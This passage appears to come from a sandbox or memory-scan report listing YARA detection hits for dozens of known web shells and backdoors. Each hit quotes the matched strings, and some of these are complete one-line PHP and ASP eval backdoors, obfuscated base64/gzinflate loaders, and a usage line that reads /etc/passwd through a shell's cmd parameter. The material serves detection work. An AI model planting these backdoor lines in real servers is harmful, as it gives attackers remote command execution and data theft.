- 0x2fd6b:$s3: @preg_replace("/f/e",$_GET['u'],"fengjiao");
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_JJJsp2 | Web shells - generated from file JJJsp2.jsp | Florian Roth | - 0x2fe7b:$s2: QQ(cs, z1, z2, sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z
- 0x2fecc:$s8: sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()+ "\t" + sQ
- 0x2ff19:$s10: ResultSet r = s.indexOf("jdbc:oracle")!=-1?c.getMetaData()
- 0x2ff59:$s11: return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase(
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_radhat | Web shells - generated from file radhat.asp | Florian Roth | - 0x3008a:$s1: sod=Array("D","7","S
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_asp1 | Web shells - generated from file asp1.asp | Florian Roth | - 0x3017d:$s0: http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave
- 0x301b5:$s2: <% a=request(chr(97)) ExecuteGlobal(StrReverse(a)) %>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_php6 | Web shells - generated from file php6.php | Florian Roth | - 0x302ca:$s1: array_map("asx73ert",(ar
- 0x302e7:$s3: preg_replace("/[errorpage]/e",$page,"saft");
- 0x30318:$s4: shell.php?qid=zxexp
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_xxx | Web shells - generated from file xxx.php | Florian Roth | - 0x3040a:$s3: <?php array_map("ass\x65rt",(array)$_REQUEST['expdoor']);?>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_GetPostpHp | Web shells - generated from file GetPostpHp.php | Florian Roth | - 0x30522:$s0: <?php eval(str_rot13('riny($_CBFG[cntr]);'));?>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_php5 | Web shells - generated from file php5.php | Florian Roth | - 0x30630:$s0: <?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_u
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_PHP | Web shells - generated from file PHP.php | Florian Roth | - 0x3075d:$s1: echo "<font color=blue>Error!</font>";
- 0x30788:$s2: <input type="text" size=61 name="f" value='<?php echo $_SERVER["SCRIPT_FILE
- 0x307d8:$s5: - ExpDoor.com</title>
- 0x307f4:$s10: $f=fopen($_POST["f"],"w");
- 0x30814:$s12: <textarea name="c" cols=60 rows=15></textarea><br>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | webshell_webshells_new_Asp | Web shells - generated from file Asp.asp | Florian Roth | - 0x30923:$s1: Execute MorfiCoder(")/*/z/*/(tseuqer lave")
- 0x30953:$s2: Function MorfiCoder(Code)
- 0x30971:$s3: MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | perlbot_pl | Semi-Auto-generated - file perlbot.pl.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x30a63:$s0: my @adms=("Kelserific","Puna","nod32")
- 0x30a8e:$s1: #Acesso a Shel - 1 ON 0 OFF
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | php_backdoor_php | Semi-Auto-generated - file php-backdoor.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x30b62:$s0: http://michaeldaw.org 2006
- 0x4188e:$s0: http://michaeldaw.org 2006
- 0x41fb5:$s0: http://michaeldaw.org 2006
- 0x30b83:$s1: or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
- 0x30bcb:$s3: coded by z0mbie
- 0x3fddf:$s3: coded by z0mbie
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php | Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x30cf1:$s0: <option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</opt
- 0x2199b:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x30c43:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x30d44:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x3faea:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x3fc0f:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x30d7c:$s2: echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>";
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Nshell__1__php_php | Semi-Auto-generated - file Nshell (1).php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x30e75:$s0: echo "Command : <INPUT TYPE=text NAME=cmd value=".@stripslashes(htmlentities($
- 0x30ec8:$s1: if(!$whoami)$whoami=exec("whoami"); echo "whoami :".$whoami."<br>";
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | shankar_php_php | Semi-Auto-generated - file shankar.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x30fc7:$sAuthor: ShAnKaR
- 0x43c0f:$sAuthor: ShAnKaR
- 0x43c54:$sAuthor: ShAnKaR
- 0x30fd3:$s0: <input type=checkbox name='dd' ".(isset($_POST['dd'])?'checked':'').">DB<input
- 0x31026:$s3: Show<input type=text size=5 value=".((isset($_POST['br_st']) && isset($_POST['b
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Casus15_php_php | Semi-Auto-generated - file Casus15.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3112c:$s0: copy ( $dosya_gonder2, "$dir/$dosya_gonder2_name") ? print("$dosya_gonder2_na
- 0x3117e:$s2: echo "<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'
- 0x311d2:$s3: value='Calistirmak istediginiz
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | small_php_php | Semi-Auto-generated - file small.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x239e6:$s1: $pass='abcdef1234567890abcdef1234567890';
- 0x312a4:$s1: $pass='abcdef1234567890abcdef1234567890';
- 0x312d2:$s2: eval(gzinflate(base64_decode('FJzHkqPatkU/550IGnjXxHvv6bzAe0iE5+svFVGtKqXMZq05x1
- 0x239c6:$s4: @ini_set('error_log',NULL);
- 0x31327:$s4: @ini_set('error_log',NULL);
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | shellbot_pl | Semi-Auto-generated - file shellbot.pl.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x313f1:$s0: ShellBOT
- 0x313fe:$s1: PacktsGr0up
- 0x3140e:$s2: CoRpOrAtIoN
- 0x3141e:$s3: # Servidor de irc que vai ser usado
- 0x31447:$s4: /^ctcpflood\s+(\d+)\s+(\S+)
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | fuckphpshell_php | Semi-Auto-generated - file fuckphpshell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3151b:$s0: $succ = "Warning!
- 0x31532:$s1: Don`t be stupid .. this is a priv3 server, so take extra care!
- 0x31575:$s2: \*=-- MEMBERS AREA --=*/
- 0x31592:$s3: preg_match('/(\n[^\n]*){' . $cache_lines . '}$/', $_SESSION['o
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ngh_php_php | Semi-Auto-generated - file ngh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3167f:$s0: Cr4sh_aka_RKL
- 0x404d1:$s0: Cr4sh_aka_RKL
- 0x31691:$s1: NGH edition
- 0x404e6:$s1: NGH edition
- 0x316a1:$s2: /* connectback-backdoor on perl
- 0x316c5:$s3: <form action=<?=$script?>?act=bindshell method=POST>
- 0x404fc:$s3: <form action=<?=$script?>?act=bindshell method=POST>
- 0x316fe:$s4: $logo = "R0lGODlhMAAwAOYAAAAAAP////r
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | jsp_reverse_jsp | Semi-Auto-generated - file jsp-reverse.jsp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x317d9:$s0: // backdoor.jsp
- 0x317ed:$s1: JSP Backdoor Reverse Shell
- 0x30b62:$s2: http://michaeldaw.org
- 0x3180c:$s2: http://michaeldaw.org
- 0x33e77:$s2: http://michaeldaw.org
- 0x41867:$s2: http://michaeldaw.org
- 0x4188e:$s2: http://michaeldaw.org
- 0x41f8e:$s2: http://michaeldaw.org
- 0x41fb5:$s2: http://michaeldaw.org
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Tool_asp | Semi-Auto-generated - file Tool.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x318ca:$s0: mailto:rhfactor@antisocial.com
- 0x318ed:$s2: ?raiz=root
- 0x318fc:$s3: DIGO CORROMPIDO<BR>CORRUPT CODE
- 0x31920:$s4: key = "5DCADAC1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E53205CA0
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | NT_Addy_asp | Semi-Auto-generated - file NT Addy.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x31a1e:$s0: NTDaddy v1.9 by obzerve of fux0r inc
- 0x31a47:$s2: <ERROR: THIS IS NOT A TEXT FILE>
- 0x41cc3:$s2: <ERROR: THIS IS NOT A TEXT FILE>
- 0x31a6c:$s4: RAW D.O.S. COMMAND INTERFACE
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | SimAttacker___Vrsion_1_0_0___priv8_4_My_friend_php | Semi-Auto-generated - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x31b85:$s0: SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend
- 0x31bba:$s3: fputs ($fp ,"\n*********************************************\nWelcome T0 Sim
- 0x31c0c:$s4: echo "<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | RemExp_asp | Semi-Auto-generated - file RemExp.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x31d08:$s0: <title>Remote Explorer</title>
- 0x31d2b:$s3: FSO.CopyFile Request.QueryString("FolderPath") & Request.QueryString("CopyFi
- 0x31d7d:$s4: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x3da8b:$s4: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x4da3a:$s4: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | phvayvv_php_php | Semi-Auto-generated - file phvayvv.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x31e7f:$s0: {mkdir("$dizin/$duzenx2",777)
- 0x31ea1:$s1: $baglan=fopen($duzkaydet,'w');
- 0x31ec4:$s2: PHVayv 1.0
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | klasvayv_asp | Semi-Auto-generated - file klasvayv.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x31f7f:$s1: set aktifklas=request.querystring("aktifklas")
- 0x31fb2:$s2: action="klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>
- 0x32003:$s3: <font color="#858585">www.aventgrup.net
- 0x3202f:$s4: style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | rst_sql_php_php | Semi-Auto-generated - file rst_sql.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x32273:$s0: C:\tmp\dump_
- 0x32284:$s1: RST MySQL
- 0x379ce:$s1: RST MySQL
- 0x32292:$s2: http://rst.void.ru
- 0x379ee:$s2: http://rst.void.ru
- 0x37a0a:$s2: http://rst.void.ru
- 0x322a9:$s3: $st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | wh_bindshell_py | Semi-Auto-generated - file wh_bindshell.py.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x323bb:$s0: #Use: python wh_bindshell.py [port] [password]
- 0x323ee:$s2: python -c"import md5;x=md5.new('you_password');print x.hexdigest()"
- 0x32436:$s3: #bugz: ctrl+c etc =script stoped=
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | lurm_safemod_on_cgi | Semi-Auto-generated - file lurm_safemod_on.cgi.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x32516:$s0: Network security team :: CGI Shell
- 0x3253d:$s1: #########################<<KONEC>>#####################################
- 0x32589:$s2: ##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | c99madshell_v2_0_php_php | Semi-Auto-generated - file c99madshell_v2.0.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3268d:$s2: eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXef
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | backupsql_php_often_with_c99shell | Semi-Auto-generated - file backupsql.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x327a8:$s2: //$message.= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" .
- 0x327f6:$s4: $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog
- 0x42a47:$s4: $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | uploader_php_php | Semi-Auto-generated - file uploader.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x328fe:$s2: move_uploaded_file($userfile, "entrika.php");
- 0x41385:$s2: move_uploaded_file($userfile, "entrika.php");
- 0x32931:$s3: Send this file: <INPUT NAME="userfile" TYPE="file">
- 0x32969:$s4: <INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="100000">
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | telnet_pl | Semi-Auto-generated - file telnet.pl.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x32a4d:$s0: W A R N I N G: Private Server
- 0x384ae:$s0: W A R N I N G: Private Server
- 0x32a6f:$s2: $Message = q$<pre><font color="#669999"> _____ _____ _____ _____
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | w3d_php_php | Semi-Auto-generated - file w3d.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x32b6c:$s0: W3D Shell
- 0x32b7a:$s1: By: Warpboy
- 0x32b8a:$s2: No Query Executed
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_cgi | Semi-Auto-generated - file WebShell.cgi.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x32bd1:$s0: WebShell.cgi
- 0x32c4c:$s0: WebShell.cgi
- 0x32c5d:$s2: <td><code class="entry-[% if entry.all_rights %]mine[% else
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WinX_Shell_html | Semi-Auto-generated - file WinX Shell.html.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2366b:$s0: WinX Shell
- 0x32cd1:$s0: WinX Shell
- 0x32d4f:$s0: WinX Shell
- 0x4477a:$s0: WinX Shell
- 0x4489a:$s0: WinX Shell
- 0x32d5e:$s1: Created by greenwood from n57
- 0x448bc:$s1: Created by greenwood from n57
- 0x32d80:$s2: <td><font color=\"#990000\">Win Dir:</font></td>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Dx_php_php | Semi-Auto-generated - file Dx.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x1f2e4:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x32e5d:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x356b0:$s0: print "\n".'Tip: to view the file "as is" - open the page in <a href="'.Dx
- 0x32eac:$s2: $DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Util
- 0x32f01:$s3: $ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | csh_php_php | Semi-Auto-generated - file csh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x32ffc:$s0: .::[c0derz]::. web-shell
- 0x33019:$s1: http://c0derz.org.ua
- 0x33032:$s2: vint21h@c0derz.org.ua
- 0x3304c:$s3: $name='63a9f0ea7bb98050796b649e85481845';//root
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | pHpINJ_php_php | Semi-Auto-generated - file pHpINJ.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x33130:$s1: News Remote PHP Shell Injection
- 0x33154:$s3: Php Shell <br />
- 0x402ec:$s3: Php Shell <br />
- 0x33169:$s4: <input type = "text" name = "url" value = "
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | sig_2008_php_php | Semi-Auto-generated - file 2008.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x33249:$s0: Codz by angel(4ngel)
- 0x33262:$s1: Web: http://www.4ngel.net
- 0x33280:$s2: $admin['cookielife'] = 86400;
- 0x332a2:$s3: $errmsg = 'The file you want Downloadable was nonexistent';
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ak74shell_php_php | Semi-Auto-generated - file ak74shell.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x33398:$s1: $res .= '<td align="center"><a href="'.$xshell.'?act=chmod&file='.$_SESSION[
- 0x333e9:$s2: AK-74 Security Team Web Site: www.ak74-team.net
- 0x42c66:$s2: AK-74 Security Team Web Site: www.ak74-team.net
- 0x333bf:$s3: $xshell
- 0x3341d:$s3: $xshell
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Rem_View_php_php | Semi-Auto-generated - file Rem View.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x334dd:$s0: $php="/* line 1 */\n\n// ".mm("for example, uncomment next line")."
- 0x1be12:$s2: <input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'
- 0x33525:$s2: <input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'
- 0x33576:$s4: Welcome to phpRemoteView (RemView)
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Java_Shell_js | Semi-Auto-generated - file Java Shell.js.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3364b:$s2: PySystemState.initialize(System.getProperties(), null, argv);
- 0x3368d:$s3: public class JythonShell extends JPanel implements Runnable {
- 0x336cf:$s4: public static int DEFAULT_SCROLLBACK = 100
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | STNC_php_php | Semi-Auto-generated - file STNC.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x337aa:$s0: drmist.ru
- 0x337b8:$s1: hidden("action","download").hidden_pwd()."<center><table><tr><td width=80
- 0x33806:$s2: STNC WebShell
- 0x43303:$s2: STNC WebShell
- 0x33818:$s3: http://www.security-teams.net/index.php?showtopic=
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | aZRaiLPhp_v1_0_php | Semi-Auto-generated - file aZRaiLPhp v1.0.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x33907:$s0: azrailphp
- 0x33915:$s1: <br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>
- 0x33963:$s3: <center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Moroccan_Spamers_Ma_EditioN_By_GhOsT_php | Semi-Auto-generated - file Moroccan Spamers Ma-EditioN By GhOsT.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x33a8c:$s0: ;$sd98="john.barker446@gmail.com"
- 0x33ab2:$s1: print "Sending mail to $to....... ";
- 0x4218d:$s1: print "Sending mail to $to....... ";
- 0x33adb:$s2: <td colspan="2" width="715" background="/simparts/images/cellpic1.gif" hei
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | zacosmall_php | Semi-Auto-generated - file zacosmall.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x32f0a:$s0: rand(1,99999);$sj98
- 0x33bd8:$s0: rand(1,99999);$sj98
- 0x36151:$s0: rand(1,99999);$sj98
- 0x3738e:$s0: rand(1,99999);$sj98
- 0x454ac:$s0: rand(1,99999);$sj98
- 0x33bf0:$s1: $dump_file.='`'.$rows2[0].'`
- 0x33c11:$s3: filename=\"dump_{$db_dump}_${table_d
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | CmdAsp_asp | Semi-Auto-generated - file CmdAsp.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x33c69:$s0: CmdAsp.asp
- 0x33ce2:$s0: CmdAsp.asp
- 0x423c6:$s0: CmdAsp.asp
- 0x42520:$s0: CmdAsp.asp
- 0x42534:$s0: CmdAsp.asp
- 0x4a9bd:$s0: CmdAsp.asp
- 0x1c4d6:$s1: Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
- 0x33cf1:$s1: Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
- 0x33d36:$s2: -- Use a poor man's pipe ... a temp file --
- 0x424b4:$s2: -- Use a poor man's pipe ... a temp file --
- 0x33d66:$s3: maceo @ dogmile.com
- 0x42499:$s3: maceo @ dogmile.com
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | simple_backdoor_php | Semi-Auto-generated - file simple-backdoor.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x22597:$s0: $cmd = ($_REQUEST['cmd']);
- 0x33e38:$s0: $cmd = ($_REQUEST['cmd']);
- 0x4191e:$s0: $cmd = ($_REQUEST['cmd']);
- 0x33e57:$s1: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x41847:$s1: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x41f6e:$s1: Simple PHP backdoor by DK (http://michaeldaw.org) -->
- 0x33e96:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x418b6:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
- 0x41fdd:$s2: Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | mysql_shell_php | Semi-Auto-generated - file mysql_shell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x33f8d:$s0: SooMin Kim
- 0x38ec0:$s0: SooMin Kim
- 0x33f9c:$s1: smkim@popeye.snu.ac.kr
- 0x33fb7:$s2: echo "<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablen
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Dive_Shell_1_0___Emperor_Hacking_Team_php | Semi-Auto-generated - file Dive Shell 1.0 - Emperor Hacking Team.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x340f1:$s0: Emperor Hacking TEAM
- 0x3410a:$s1: Simshell
- 0x34986:$s1: Simshell
- 0x29b4a:$s2: ereg('^[[:blank:]]*cd[[:blank:]]
- 0x34117:$s2: ereg('^[[:blank:]]*cd[[:blank:]]
- 0x349a1:$s2: ereg('^[[:blank:]]*cd[[:blank:]]
- 0x383c2:$s2: ereg('^[[:blank:]]*cd[[:blank:]]
- 0x3413c:$s3: <form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Asmodeus_v0_1_pl | Semi-Auto-generated - file Asmodeus v0.1.pl.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x34240:$s0: [url=http://www.governmentsecurity.org
- 0x3426b:$s1: perl asmodeus.pl client 6666 127.0.0.1
- 0x34296:$s2: print "Asmodeus Perl Remote Shell
- 0x342bc:$s4: $internet_addr = inet_aton("$host") or die "ALOA:$!\n";
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | backup_php_often_with_c99shell | Semi-Auto-generated - file backup.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x343b8:$s0: #phpMyAdmin MySQL-Dump
- 0x343d3:$s2: ;db_connect();header('Content-Type: application/octetstr
- 0x34410:$s4: $data .= "#Database: $database
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Reader_asp | Semi-Auto-generated - file Reader.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x344db:$s1: Mehdi & HolyDemon
- 0x344f1:$s2: www.infilak.
- 0x34502:$s3: '*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width="75%
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | phpshell17_php | Semi-Auto-generated - file phpshell17.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x1b56f:$s0: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x34605:$s0: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x52c98:$s0: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x3464d:$s1: <title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]<?php echo PHPSHELL_VERSION ?></
- 0x346a2:$s2: href="mailto: [YOU CAN ENTER YOUR MAIL HERE]- [ADDITIONAL TEXT]</a></i>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | myshell_php_php | Semi-Auto-generated - file myshell.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x347a0:$s0: @chdir($work_dir) or ($shellOutput = "MyShell: can't change directory.
- 0x347eb:$s1: echo "<font color=$linkColor><b>MyShell file editor</font> File:<font color
- 0x3483b:$s2: $fileEditInfo = " ::::::: Owner: <font color=$
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | SimShell_1_0___Simorgh_Security_MGZ_php | Semi-Auto-generated - file SimShell 1.0 - Simorgh Security MGZ.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x34967:$s0: Simorgh Security Magazine
- 0x34986:$s1: Simshell.css
- 0x34997:$s2: } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'],
- 0x349e8:$s3: www.simorgh-ev.com
- 0x3ef78:$s3: www.simorgh-ev.com
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | jspshall_jsp | Semi-Auto-generated - file jspshall.jsp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x34aab:$s0: kj021320
- 0x34ab8:$s1: case 'T':systemTools(out);break;
- 0x34add:$s2: out.println("<tr><td>"+ico(50)+f[i].getName()+"</td><td> file
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | rootshell_php | Semi-Auto-generated - file rootshell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x34cbc:$s0: shells.dl.am
- 0x34ccd:$s1: This server has been infected by $owner
- 0x34cf9:$s2: <input type="submit" value="Include!" name="inc"></p>
- 0x34d33:$s4: Could not write to file! (Maybe you didn't enter any text?)
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | connectback2_pl | Semi-Auto-generated - file connectback2.pl.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x34e25:$s0: #We Are: MasterKid, AleXutz, FatMan & MiKuTuL
- 0x34e7a:$s1: echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shel
- 0x34ecf:$s2: ConnectBack Backdoor
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | DefaceKeeper_0_2_php | Semi-Auto-generated - file DefaceKeeper_0.2.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x34fa4:$s0: target fi1e:<br><input type="text" name="target" value="index.php"></br>
- 0x34ff1:$s1: eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJhV2R1YjNKbFgzVnpaWEpmWVdKdmNuUW9
